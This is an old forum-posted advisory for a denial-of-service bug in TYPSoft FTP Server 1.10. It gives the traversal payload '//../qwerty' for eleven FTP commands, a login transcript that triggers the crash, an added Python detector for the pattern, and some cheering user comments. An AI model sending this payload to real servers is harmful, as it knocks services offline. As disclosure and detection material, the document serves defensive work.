Nexcess
CODE


***********************************************************************

1. Description
2. The bug
3. The code
4. The fix

***********************************************************************

^^^^^^^^^^^^^^^^
1. Description:
^^^^^^^^^^^^^^^^

Vendor's Description:

"TYPSoft FTP Server is a fast and easy ftp server with support to
Standard FTP Command, Clean interface, Virtual File System
architecture, ability to resume Download and Upload, IP Restriction,
Login/Quit message, logs, Multi Language and many other things."

***********************************************************************

^^^^^^^^^^^^^^^^
2. The bug:
^^^^^^^^^^^^^^^^

TYPSoft FTP Server may be DoS'ed with standard FTP commands:
mkd, xmkd, dele, size, retr, stor, appe, rnfr, rnto, rmd, xrmd,
with the parameter "//../qwerty", like this:

mkd //../qwerty
xmkd //../qwerty
dele //../qwerty
size //../qwerty
retr //../qwerty
stor //../qwerty
appe //../qwerty
rnfr //../qwerty
rnto //../qwerty
rmd //../qwerty
xrmd //../qwerty

***********************************************************************

^^^^^^^^^^^^^^^^
3. The code:
^^^^^^^^^^^^^^^^

To test the vulnerability:

-----------------------------------------------------------------------
220 TYPSoft FTP Server 1.10 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
mkd //../qwerty
-----------------------------------------------------------------------

and the FTP server will be DoS'ed, with 100% usage of computer resources.


/*Tested on: Win XP Build 2600, Service Pack: None
            Win XP Build 2600, Service Pack: SP1*/

***********************************************************************

^^^^^^^^^^^^^^^^
4. The fix:
^^^^^^^^^^^^^^^^

Does not exist.

***********************************************************************
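
With no fix available, one defensive option is to flag the pattern from section 2 in a proxy or session log: one of the listed commands whose path argument climbs above the virtual root. The sketch below is an added example, not part of the original post or of TYPSoft's code, and it generalizes from "//../qwerty" to any such path. The function names, the backslash handling and the sample session are assumptions constructed for illustration.

```python
# Commands the advisory lists as affected (matched case-insensitively).
AFFECTED = {"MKD", "XMKD", "DELE", "SIZE", "RETR", "STOR",
            "APPE", "RNFR", "RNTO", "RMD", "XRMD"}

def escapes_root(arg, cwd="/"):
    """True if the FTP path argument climbs above the virtual root."""
    # Assumption: a Windows server may accept "\" as a path separator too.
    path = arg.replace("\\", "/")
    if not path.startswith("/"):
        path = cwd.rstrip("/") + "/" + path   # resolve relative to the session cwd
    depth = 0
    for part in path.split("/"):
        if part in ("", "."):                 # empty parts come from "//"
            continue
        if part == "..":
            depth -= 1
            if depth < 0:                     # walked above "/"
                return True
        else:
            depth += 1
    return False

def suspicious(line, cwd="/"):
    """Flag one client command line taken from a proxy or session log."""
    verb, _, arg = line.strip().partition(" ")
    return verb.upper() in AFFECTED and escapes_root(arg, cwd)

def flagged(lines, cwd="/"):
    """Return the command lines that match the advisory's pattern."""
    return [line for line in lines if suspicious(line, cwd)]

# Constructed sample session, not captured traffic.
SAMPLE = [
    "user anonymous",
    "mkd //../qwerty",          # the advisory's test case
    "retr /pub/../readme.txt",  # stays inside the root
    "XRMD ..\\qwerty",          # backslash variant (assumption)
    "stor uploads/new.bin",
    "list //../qwerty",         # LIST is not in the advisory's command list
]

if __name__ == "__main__":
    for line in flagged(SAMPLE):
        print("ALERT", line)
```
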

tba
damn dos exploits :@
Pro21
Hihi DOS P@W@

Thx
stonebreaker
but there is no shell

DvilleStoner
haha, very funny stuff
stonebreaker
I use TYPSoft FTP Server all along
because it is very simple to config, it is very easy hehe
now after reading this article I will change one or update it